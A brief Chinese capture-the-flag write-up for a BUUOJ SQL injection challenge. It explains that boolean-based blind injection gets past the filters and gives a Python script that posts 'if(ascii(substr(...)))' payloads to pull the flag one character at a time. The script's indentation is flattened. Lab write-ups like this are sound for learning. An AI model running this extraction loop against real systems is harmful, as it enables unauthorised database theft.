知识点
基于布尔型盲注
编写python脚本能力
审题
很简洁的一个post提交sql注入题 测试了一下 过滤了一大堆 尝试了基于时间的布尔盲注 被过滤 然后尝试了一下基于布尔型的盲注 成功
然后就是很简单的编写脚本 算是个简单题
这个就是成功回显页面 可以看到和输入id=1回显一样 下面贴出脚本
EXP
import requests
url = 'http://3c029064-6b6f-4efb-b2e0-ebb2495ed95a.node3.buuoj.cn/index.php'
result = ''
num = 0
for i in range (1,60):
if (num == 1):
break;
for j in range (32,128):
payload = 'if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)'%(i,j)
print(payload)
data = {
'id' : payload,
}
r = requests.post(url , data = data)
if '}' in r.text:
num = 1
print(result
)
break
if 'Hello' in r.text:
x = chr(j)
result += str(x)
print(result)
break
EOF